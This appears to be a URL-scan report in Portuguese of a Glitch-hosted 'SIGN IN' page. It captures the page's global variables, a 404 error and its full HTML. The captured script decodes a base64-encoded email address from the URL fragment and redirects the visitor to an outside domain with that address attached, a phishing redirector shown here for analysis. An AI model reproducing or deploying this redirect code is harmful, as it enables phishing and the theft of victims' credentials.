https://heluniversalec.glitch.me/

ID da verificação
36c7eb32-13dd-4263-a366-2ba01a5f583fConcluído
URL enviado:
https://heluniversalec.glitch.me/
Relatório concluído:
NomeTipo
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
base64Decodefunction
hashstring
TipoCategoriaRegisto
errornetwork
URL
https://heluniversalec.glitch.me/favicon.ico
Texto
Failed to load resource: the server responded with a status of 404 ()
<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>SIGN IN</title>
</head>
<body>
<script>
  function base64Decode(str) {
    try {
      return decodeURIComponent(atob(str).split('').map(function(c) {
        return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);
      }).join(''));
    } catch (e) {
      console.error('Invalid base64 string:', str);
      return null;
    }
  }

  var hash = window.location.hash;
  if (hash !== "") {
    hash = hash.substring(1); // Remove the '#' character
    const email = base64Decode(hash);

    if (email) {
      window.location.href = "https://sales5rrt.digital/hdqops/Nandsrotomould.html#" + (email);
    }
  }
</script>

</body></html>